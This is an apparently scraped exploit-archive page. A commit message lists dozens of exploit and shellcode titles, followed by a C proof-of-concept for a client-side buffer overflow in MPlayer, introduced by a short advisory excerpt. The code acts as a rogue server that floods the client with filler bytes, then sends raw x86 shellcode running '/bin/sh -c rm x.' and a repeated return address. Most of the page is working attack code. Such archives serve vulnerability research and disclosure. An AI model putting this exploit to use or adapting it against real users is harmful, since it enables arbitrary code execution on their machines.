880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
109 lines
No EOL
2.3 KiB
C
109 lines
No EOL
2.3 KiB
C
// source: https://www.securityfocus.com/bid/11962/info
|
|
|
|
A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.
|
|
|
|
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
|
|
|
|
char payload[] = {
|
|
0xeb ,0x47
|
|
,0x59
|
|
,0x89 ,0xca
|
|
,0x83 ,0xc2 ,0x18
|
|
,0x89 ,0x11
|
|
,0x31 ,0xc0
|
|
,0x89 ,0x41 ,0x04
|
|
,0x83 ,0xc2 ,0x13
|
|
,0x89 ,0x51 ,0x08
|
|
,0x83 ,0xc2 ,0x08
|
|
,0x89 ,0x51 ,0x0c
|
|
,0x83 ,0xc2 ,0x03
|
|
,0x89 ,0x51 ,0x10
|
|
,0x89 ,0x41 ,0x14
|
|
,0x88 ,0x41 ,0x2a
|
|
,0x88 ,0x41 ,0x32
|
|
,0x88 ,0x41 ,0x35
|
|
,0x88 ,0x41 ,0x3a
|
|
,0x51
|
|
,0x83 ,0xc1 ,0x08
|
|
,0x51
|
|
,0x83 ,0xc1 ,0x20
|
|
,0x83 ,0xc1 ,0x03
|
|
,0x51
|
|
,0x83 ,0xc0 ,0x3b
|
|
,0x50
|
|
,0xcd ,0x80
|
|
,0x31 ,0xc0
|
|
,0x50
|
|
,0x40
|
|
,0x50
|
|
,0xcd ,0x80
|
|
,0xe8 ,0xb4 ,0xff ,0xff ,0xff
|
|
,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
|
|
,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
|
|
,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
|
|
,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
|
|
,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
|
|
,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
|
|
,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
|
|
,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
|
|
,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
|
|
,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
|
|
} ;
|
|
|
|
#include <stdio.h>
|
|
|
|
main()
|
|
{
|
|
|
|
char buf[256];
|
|
int len;
|
|
int s,i;
|
|
len=recv(0,buf,256,0);
|
|
|
|
printf("hello\n");
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
|
|
printf("hello\n");
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
for (i=0;i<50000;i++)
|
|
putchar('A');
|
|
for (i=0;i<sizeof payload;i++)
|
|
putchar (payload[i]);
|
|
|
|
printf("123");
|
|
for (i=0;i<20000;i++) // RA all the way....
|
|
{
|
|
putchar(0x01);
|
|
putchar(0x15);
|
|
putchar(0xbb);
|
|
putchar(0xbf);
|
|
}
|
|
fflush(stdout);
|
|
} |